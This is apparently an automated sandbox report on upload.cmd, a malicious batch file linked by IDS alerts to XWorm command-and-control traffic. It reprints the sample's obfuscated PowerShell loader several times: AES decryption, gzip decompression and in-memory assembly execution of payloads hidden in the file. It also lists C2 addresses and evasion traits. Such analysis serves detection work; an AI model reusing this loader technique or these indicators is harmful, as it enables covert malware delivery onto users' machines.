

Windows Analysis Report
upload.cmd

Overview

General Information

Sample name: upload.cmd
Analysis ID: 1446790
MD5: 9619f1ddef9f682e7e70d738513fbe95
SHA1: f60d6ccae771e30dd908ed35cd430321011d4e72
SHA256: e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a
Tags: cmd
Infos:

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7040 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5536 cmdline: cmd /c "set __=^&rem" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3260 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass MD5: 04029E121A0CFA5991749937DD22A1D9)
      • wermgr.exe (PID: 6340 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
No configs have been found
Source: \Device\ConDrv, Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Author: Joe Security
Source: amsi64_5212.amsi.csv, Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Author: Joe Security

      System Summary

      Source: Process started, Author: Jonathan Cheong, oscd.community, Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execu
      Source: Process started, Author: Jonathan Cheong, oscd.community, Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execu
      Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7040, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5212, ProcessName: powershell.exe
      Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7040, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5212, ProcessName: powershell.exe
      Source: Process started, Author: Hieu Tran, Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execu
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7040, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5212, ProcessName: powershell.exe
      Timestamp: 05/23/24-21:13:21.470006, SID: 2855924, Source Port: 49705, Destination Port: 8896, Protocol: TCP, Classtype: A Network Trojan was detected
      Timestamp: 05/23/24-21:16:08.014695, SID: 2852870, Source Port: 8896, Destination Port: 49705, Protocol: TCP, Classtype: A Network Trojan was detected
      Timestamp: 05/23/24-21:14:37.459862, SID: 2853193, Source Port: 49705, Destination Port: 8896, Protocol: TCP, Classtype: A Network Trojan was detected
      Timestamp: 05/23/24-21:16:05.951406, SID: 2852874, Source Port: 8896, Destination Port: 49705, Protocol: TCP, Classtype: A Network Trojan was detected


      Networking

      Source: Traffic, Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 12.202.180.134:8896
      Source: Traffic, Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8896 -> 192.168.2.8:49705
      Source: Traffic, Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8896 -> 192.168.2.8:49705
      Source: Traffic, Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 12.202.180.134:8896
      Source: unknown, DNS query: name: xgmn934.duckdns.org
      Source: global traffic, TCP traffic: 192.168.2.8:49705 -> 12.202.180.134:8896
      Source: Joe Sandbox View, IP Address: 12.202.180.134
      Source: Joe Sandbox View, ASN Name: FISERV-INCUS
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, DNS traffic detected: DNS query: xgmn934.duckdns.org
      Source: Amcache.hve.5.dr, String found in binary or memory: http://upx.sf.net
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process Stats: CPU usage > 49%
      Source: classification engine, Classification label: mal84.troj.evad.winCMD@9/9@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\wermgr.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\2utLZrxcByvppTdF
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1c1yq3g.11p.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" "
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\cmd.exe, Section loaded: cmdext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: avicap32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msvfw32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winmm.dll
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wermgr.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5060
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4837
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548; Thread sleep count: 5060 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768; Thread sleep count: 4837 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1036; Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File Volume queried: C:\ FullSizeInformation
      Source: Amcache.hve.5.dr; Binary or memory string: VMware
      Source: Amcache.hve.5.dr; Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.5.dr; Binary or memory string: vmci.syshbin
      Source: Amcache.hve.5.dr; Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.5.dr; Binary or memory string: VMware, Inc.
      Source: Amcache.hve.5.dr; Binary or memory string: VMware20,1hbin@
